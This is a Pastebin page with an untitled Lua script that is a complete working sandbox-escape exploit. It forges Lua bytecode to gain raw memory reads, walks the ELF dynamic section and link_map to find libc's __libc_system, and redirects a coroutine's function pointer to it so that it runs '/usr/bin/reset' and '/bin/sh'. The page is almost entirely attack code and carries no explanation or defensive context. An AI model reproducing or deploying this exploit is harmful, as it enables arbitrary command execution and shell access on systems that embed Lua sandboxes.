API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 14th, 2020
186
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.70 KB | None | 0 0
raw download clone embed print report
  1. {
  2. asnum = load(function()
  3. if not asnum_bool then
  4. asnum_bool = true
  5. return string.dump(function(x)
  6. for i = x, x, 0 do
  7. return i
  8. end
  9. end):gsub("\96%z%z\128", "\22\0\0\128")
  10. else
  11. asnum_bool = false
  12. return nil
  13. end
  14. end)
  15.  
  16. function double_to_dwords(x)
  17. if x == 0 then return 0, 0 end
  18. if x < 0 then x = -x end
  19.  
  20. local m, e = math.frexp(x)
  21.  
  22. if e + 1023 <= 1 then
  23. m = m * 2^(e + 1074)
  24. e = 0
  25. else
  26. m = (m - 0.5) * 2^53
  27. e = e + 1022
  28. end
  29.  
  30. local lo = m % 2^32
  31. m = (m - lo) / 2^32
  32. local hi = m + e * 2^20
  33.  
  34. return lo, hi
  35. end
  36.  
  37. function dwords_to_double(lo, hi)
  38. local m = hi % 2^20
  39. local e = (hi - m) / 2^20
  40. m = m * 2^32 + lo
  41.  
  42. if e ~= 0 then
  43. m = m + 2^52
  44. else
  45. e = 1
  46. end
  47. return m * 2^(e-1075)
  48. end
  49.  
  50. function dword_to_string(x)
  51. local b0 = x % 256; x = (x - b0) / 256
  52. local b1 = x % 256; x = (x - b1) / 256
  53. local b2 = x % 256; x = (x - b2) / 256
  54. local b3 = x % 256
  55.  
  56. return string.char(b0, b1, b2, b3)
  57. end
  58.  
  59. function qword_to_string(x)
  60. local lo, hi = double_to_dwords(x)
  61. return dword_to_string(lo) .. dword_to_string(hi)
  62. end
  63.  
  64. function add_dword_to_double(x, n)
  65. local lo, hi = double_to_dwords(x)
  66. return dwords_to_double(lo + n, hi)
  67. end
  68.  
  69. rawset(_G, "add_dword_to_double", add_dword_to_double)
  70. rawset(_G, "asnum", asnum)
  71. rawset(_G, "double_to_dwords", double_to_dwords)
  72. rawset(_G, "dwords_to_double", dwords_to_double)
  73. rawset(_G, "dword_to_string", dword_to_string)
  74. rawset(_G, "qword_to_string", qword_to_string)
  75.  
  76. -- stop garbage collecting
  77. collectgarbage "stop"
  78.  
  79. f = load(function()
  80. if not f_bool then
  81. f_bool = true
  82. return string.dump(function()
  83. local magic = nil
  84. local function middle()
  85. local print = print
  86. local asnum = asnum
  87. local double_to_dwords = double_to_dwords
  88. local add_dword_to_double = add_dword_to_double
  89. local dwords_to_double = dwords_to_double
  90. local qword_to_string = qword_to_string
  91. local co = coroutine.wrap(function() end)
  92. local substr = string.sub
  93. local find = string.find
  94. local upval
  95.  
  96. -- get the address of current "lua_State"
  97. local luastate1 = asnum(coroutine.running())
  98. local luastate2 = add_dword_to_double(luastate1, 8)
  99.  
  100. -- some constants
  101. local n1 = 1
  102. local n2 = 2
  103. local n4 = 4
  104. local n6 = 6
  105. local n7 = 7
  106. local n8 = 8
  107. local n16 = 16
  108. local n24 = 24
  109. local n32 = 32
  110.  
  111. local pht_offset_from_auxwrap = 0x23a23
  112. local h38 = 0x38 -- program header entry size
  113.  
  114. local PT_DYNAMIC = 2
  115. local DT_NULL = 0
  116. local DT_STRRAB = 5
  117. local DT_SYMTAB = 6
  118. local DT_DEBUG = 21
  119.  
  120. local libc = "libc.so."
  121. local system = "__libc_system"
  122. local null = "\0"
  123. local empty = ""
  124.  
  125. -- declare some variables
  126. local luastate1_bkp
  127. local luastate2_bkp
  128.  
  129. local lo, hi
  130. local base
  131. local ptheader
  132. local dynamic
  133. local symbol
  134.  
  135. local libc_base
  136. local libc_system
  137. local libc_strtab
  138. local libc_symtab
  139. local debug
  140.  
  141. local s, e, tmp, n
  142. local str = empty
  143. local link_map
  144. local libc_dynamic
  145.  
  146. local commands = {
  147. dwords_to_double(0x7273752f, 0x6e69622f), dwords_to_double(0x7365722f, 0x00007465), -- "/usr/bin/reset"
  148. dwords_to_double(0x6e69622f, 0x0068732f), dwords_to_double(0x00000000, 0x00000000) } -- "/bin/sh"
  149.  
  150. local function put_into_magic(n)
  151. -- hand-craft an UpVal
  152. upval = "nextnexttmpaddpa" .. qword_to_string(n)
  153.  
  154. -- get the pointer to our hand-crafted UpVal
  155. local upval_ptr = qword_to_string(add_dword_to_double(asnum(upval), 24))
  156.  
  157. magic = upval_ptr .. upval_ptr .. upval_ptr
  158. end
  159.  
  160. -- put luaB_auxwrap's address into "magic"
  161. put_into_magic(add_dword_to_double(asnum(co), n32))
  162.  
  163. -- get offset to Program Header Table (ELF Header + 32)
  164. lo, hi = double_to_dwords(asnum(magic))
  165. base = dwords_to_double(lo - pht_offset_from_auxwrap, hi)
  166. put_into_magic(add_dword_to_double(base, n32))
  167.  
  168. -- get real address of Program Header Table
  169. lo, hi = double_to_dwords(asnum(magic))
  170. ptheader = add_dword_to_double(base, lo)
  171.  
  172. -- get the _DYNAMIC section's address
  173. while true do
  174. put_into_magic(ptheader)
  175. lo, hi = double_to_dwords(asnum(magic))
  176. if lo == PT_DYNAMIC then
  177. -- p_vaddr : elf64_phdr+16
  178. put_into_magic(add_dword_to_double(ptheader, n16))
  179. dynamic = asnum(magic)
  180. break
  181. else
  182. ptheader = add_dword_to_double(ptheader, h38)
  183. end
  184. end
  185.  
  186. dynamic = dynamic + base
  187.  
  188. -- get DT_DEBUG
  189. while true do
  190. put_into_magic(dynamic)
  191. lo, hi = double_to_dwords(asnum(magic))
  192.  
  193. if lo == DT_DEBUG then
  194. put_into_magic(add_dword_to_double(dynamic, n8))
  195. debug = asnum(magic)
  196. break
  197. else
  198. dynamic = add_dword_to_double(dynamic, n16)
  199. end
  200. end
  201.  
  202. -- get the pointer to the link_map structure
  203. put_into_magic(add_dword_to_double(debug, n8))
  204. link_map = asnum(magic)
  205.  
  206. -- iterate link_map until libc is found
  207. while true do
  208.  
  209. put_into_magic(add_dword_to_double(link_map, n8))
  210. n = asnum(magic)
  211.  
  212. -- we can read only 8 bytes at once, so we have to loop
  213. while true do
  214. put_into_magic(n)
  215. tmp = qword_to_string(asnum(magic))
  216.  
  217. s, e = find(tmp, null)
  218. if s then
  219. str = str .. substr(tmp, n1, s - n1)
  220. break
  221. else
  222. str = str .. tmp
  223. n = add_dword_to_double(n, n8)
  224. end
  225. end
  226.  
  227. -- have we found libc?
  228. s, e = find(str, libc)
  229. if s then
  230. put_into_magic(link_map)
  231. libc_base = asnum(magic)
  232.  
  233. -- get _DYNAMIC section for LibC
  234. put_into_magic(add_dword_to_double(link_map, n16))
  235. libc_dynamic = asnum(magic)
  236.  
  237. -- get DT_STRTAB and DT_SYMTAB from LibC
  238. while true do
  239. put_into_magic(libc_dynamic)
  240. lo, hi = double_to_dwords(asnum(magic))
  241. put_into_magic(add_dword_to_double(libc_dynamic, n8))
  242.  
  243. if lo == DT_NULL then
  244. break
  245. elseif lo == DT_STRRAB then
  246. libc_strtab = asnum(magic)
  247. elseif lo == DT_SYMTAB then
  248. libc_symtab = asnum(magic)
  249. end
  250.  
  251. libc_dynamic = add_dword_to_double(libc_dynamic, n16)
  252. end
  253.  
  254. break
  255. else
  256. put_into_magic(add_dword_to_double(link_map, n24))
  257. link_map = asnum(magic)
  258. end
  259. end
  260.  
  261. -- iterate LibC's symbol table until system (actually __libc_system) is
  262. -- found.
  263. while true do
  264. put_into_magic(libc_symtab)
  265. lo, hi = double_to_dwords(asnum(magic))
  266.  
  267. -- we can read only 8 bytes at once, so we have to loop
  268. n = add_dword_to_double(libc_strtab, lo)
  269. str = empty
  270. while true do
  271. put_into_magic(n)
  272. tmp = qword_to_string(asnum(magic))
  273.  
  274. s, e = find(tmp, null)
  275. if s then
  276. str = str .. substr(tmp, n1, s - n1)
  277. break
  278. else
  279. str = str .. tmp
  280. n = add_dword_to_double(n, n8)
  281. end
  282. end
  283.  
  284. if str and str == system then
  285. -- get __libc_sytem's real address
  286. put_into_magic(add_dword_to_double(libc_symtab, n8))
  287. lo, hi = double_to_dwords(asnum(magic))
  288. libc_system = add_dword_to_double(libc_base, lo)
  289. break
  290. else
  291. libc_symtab = add_dword_to_double(libc_symtab, n24)
  292. end
  293. end
  294.  
  295. -- replace co's function pointer to __libc_system's real address
  296. put_into_magic(add_dword_to_double(asnum(co), n32))
  297. magic = libc_system
  298.  
  299. -- save the current lua_State
  300. put_into_magic(luastate1)
  301. luastate1_bkp = asnum(magic)
  302. put_into_magic(luastate2)
  303. luastate2_bkp = asnum(magic)
  304.  
  305. -- execute commands in 16 byte chunks
  306. for i=n1,#commands,n2 do
  307. put_into_magic(luastate1)
  308. magic = commands[i]
  309. put_into_magic(luastate2)
  310. magic = commands[i + n1]
  311. co()
  312. end
  313.  
  314. -- restore the original lua_State
  315. put_into_magic(luastate1)
  316. magic = luastate1_bkp
  317. put_into_magic(luastate2)
  318. magic = luastate2_bkp
  319.  
  320. end
  321. middle()
  322. end):gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1)
  323. else
  324. f_bool = false
  325. return nil
  326. end
  327. end)
  328. coroutine.wrap(f)()
  329. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!